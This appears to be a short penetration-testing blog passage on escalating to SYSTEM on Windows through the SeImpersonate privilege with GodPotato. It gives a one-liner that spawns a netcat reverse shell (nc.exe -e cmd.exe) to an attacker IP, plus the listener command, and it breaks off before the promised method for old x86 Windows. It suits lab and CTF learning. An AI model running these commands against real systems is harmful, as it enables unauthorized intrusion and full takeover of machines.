SeImpersonate on old Windows Boxes

If you’re like me, when I’m working on a Windows box trying to elevate my privileges and I see “SeImpersonate,” I feel like I just won the Powerball (the American lottery). It’s so easy that even my 3-year-old could do it. Ok, ok, not that easy, but you get the idea. Basically, you just download GodPotato — and that’s it. Unless… we’re dealing with an old Windows box. Those are x86, and these new Potatoes don’t work there. Read ahead — I’ll spill the beans for you. I’ll explain in detail what to do and how to get that juicy NT AUTHORITY\SYSTEM.

SeImpersonate is one of the easiest ways to gain administrative privileges on Windows. You just run whoami /priv, and if you see it listed, you upload the right version of GodPotato to the Windows victim along with nc.exe, and boom—you've got a reverse shell with admin privileges. Basically, it goes like this:

.\GodPotato.exe -cmd "c:\users\public\nc.exe -t -e C:\Windows\System32\cmd.exe 10.10.14.179 80"

On Kali, you set up a netcat listener and just grab the shell. I like to use rlwrap for a better shell experience

sudo rlwrap -cAr nc -lvnp 80

The problem is, this won’t work on old Windows versions — Windows 2008, Windows 7, etc. So, what are you gonna do? You’re one step away from pwning the box. You know how. You just need the right Potato.